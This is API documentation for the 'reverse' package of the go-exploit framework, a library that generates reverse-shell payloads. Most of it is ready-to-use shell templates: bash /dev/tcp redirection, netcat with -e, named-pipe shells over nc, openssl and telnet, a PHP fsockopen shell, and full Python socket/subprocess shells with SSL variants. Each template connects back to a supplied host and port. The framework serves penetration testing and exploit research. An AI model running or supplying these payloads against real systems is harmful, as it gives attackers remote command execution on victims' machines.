Documentation
¶
Overview ¶
Reverse shell and command payloads.
The reverse package contains all the code for reverse shell payloads. Each of these payload types can be used either in the raw string format for manipulation or via the specific payload type provided by the project.
This package is designed to be abstract enough to allow for multiple types of composition, but always with the fact that payloads are almost always string or byte oriented. With this in mind the payloads may be invoked with a constructed type or a direct string call.
For example, here are the 3 ways to create a netcat reverse shell payload that result in the same payload:
reverse.Netcat.Default("127.0.0.1", 1337)
reverse.Netcat.Mknod("127.0.0.1", 1337)
fmt.Sprintf(reverse.NetcatMknod, "127.0.0.1", 1337)
Each of the defined payload types should utilize a Default reverse shell constant that corresponds to the most common case.
Index ¶
Examples ¶
Constants ¶
const ( BashDefault = BashTCPRedirection BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'` )
const ( GJScriptDefault = GJScriptGLibSpawn GJScriptGLibSpawn = `` /* 528-byte string literal not displayed */ )
const ( JavaDefault = JavaProcessBuilderInteractive JavaProcessBuilderInteractive = `` /* 670-byte string literal not displayed */ )
const ( NetcatDefault = NetcatGaping NetcatGaping = `nc %s %d -e /bin/sh` NetcatMknod = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;` )
const ( OpenSSLDefault = OpenSSLMknod OpenSSLMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;` OpenSSLMkfifo = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;` )
const ( PHPDefault = PHPLinuxInteractive PHPLinuxInteractive = `<? $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>` PHPUnflattened = `` /* 1000-byte string literal not displayed */ )
const ( PythonDefault = Python27 Python27 = "import socket\n" + "import subprocess\n" + "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" + "s.connect(('%s', %d))\n" + "while 1:\n" + " data = s.recv(1024).decode('UTF-8')\n" + " if data == 'exit\\n':\n" + " break\n" + " if len(data) > 0:\n" + " proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" + " s.send(proc.stdout.read() + proc.stderr.read())\n" + "s.close()\n" Python27Secure = "import socket\n" + "import subprocess\n" + "import ssl\n" + "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" + "s.connect(('%s', %d))\n" + "sslsock = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)\n" + "while 1:\n" + " data = sslsock.recv(1024).decode('UTF-8')\n" + " if data == 'exit\\n':\n" + " break\n" + " if len(data) > 0:\n" + " proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" + " sslsock.send(proc.stdout.read() + proc.stderr.read())\n" + "sslsock.close()\n" )
const ( TelnetDefault = TelnetMknod TelnetMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s:%d > %s; rm %s;` TelnetMknodNoColon = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s %d > %s; rm %s;` TelnetMkfifo = `cd /tmp; mkfifo %s; telnet %s:%d 0<%s | sh 1>%s; rm %s;` TelnetMkfifoNoColon = `cd /tmp; mkfifo %s; telnet %s %d 0<%s | sh 1>%s; rm %s;` )
Variables ¶
var Bash = &BashPayload{}
Makes the Bash payloads accessible via `reverse.Bash`
var GJScript = &GJScriptPayload{}
var JJS = &JJSScriptPayload{}
var Java = &JavaPayload{}
var Netcat = &NetcatPayload{}
var OpenSSL = &OpenSSLPayload{}
var PHP = &PHPPayload{}
var Python = &PythonPayload{}
var Telnet = &TelnetPayload{}
Functions ¶
This section is empty.
Types ¶
type BashPayload ¶
type BashPayload struct{}
Defines the default Bash struct and all associated payload functions
func (*BashPayload) Default ¶
func (bash *BashPayload) Default(lhost string, lport int) string
The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash
Example ¶
package main
import (
"fmt"
"github.com/vulncheck-oss/go-exploit/payload/reverse"
)
func main() {
fmt.Println(reverse.Bash.Default("127.0.0.1", 1337))
// Ouput:
// bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'
}
func (*BashPayload) TCPRedirection ¶
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string
Utilizes the bash networking pseudo `/dev/tcp/` functionality to create a reverse bash shell.
type GJScriptPayload ¶
type GJScriptPayload struct{}
type JJSScriptPayload ¶
type JJSScriptPayload struct{}
func (*JJSScriptPayload) Default ¶
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string
Generates a script that can be used to create a reverse shell via jjs (Java javascript). This is an adapted version of Frohoff's OG gist. Additionally, the disabling of TLS validation logic was adapted from a blog written by Callan Howell-Pavia.
The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/ https://gist.github.com/frohoff/8e7c2bf3737032a25051
type JavaPayload ¶
type JavaPayload struct{}
func (*JavaPayload) Default ¶
func (java *JavaPayload) Default(lhost string, lport int) string
Defaults to the UnflattenedJava payload
func (*JavaPayload) UnflattenedJava ¶
func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
type NetcatPayload ¶
type NetcatPayload struct{}
type OpenSSLPayload ¶
type OpenSSLPayload struct{}
func (*OpenSSLPayload) Default ¶
func (openssl *OpenSSLPayload) Default(lhost string, lport int) string
type PHPPayload ¶
type PHPPayload struct{}
func (*PHPPayload) LinuxInteractive ¶
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
A short payload that creates a reverse shell using /bin/sh -i.
func (*PHPPayload) Unflattened ¶
Creates an encrypted reverse shell using PHP. The user can specify the shell used, for example cmd.exe, /bin/sh, etc. The user also specifies if the reverse shell should be encrypted or not.
reverse.PHP.Unflattened("10.9.49.80", 1270, "/bin/sh", true).
type PythonPayload ¶
type PythonPayload struct{}
func (*PythonPayload) Python27 ¶
func (py *PythonPayload) Python27(lhost string, lport int) string
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func (*PythonPayload) SecurePython27 ¶
func (py *PythonPayload) SecurePython27(lhost string, lport int) string
An unflattened reverse shell that uses an SSL socket, works on Python 2.7, 3+, Windows and Linux.
type Reverse ¶
type Reverse interface {
Default
}
Defines the Default function to be created for each type of payload
Source Files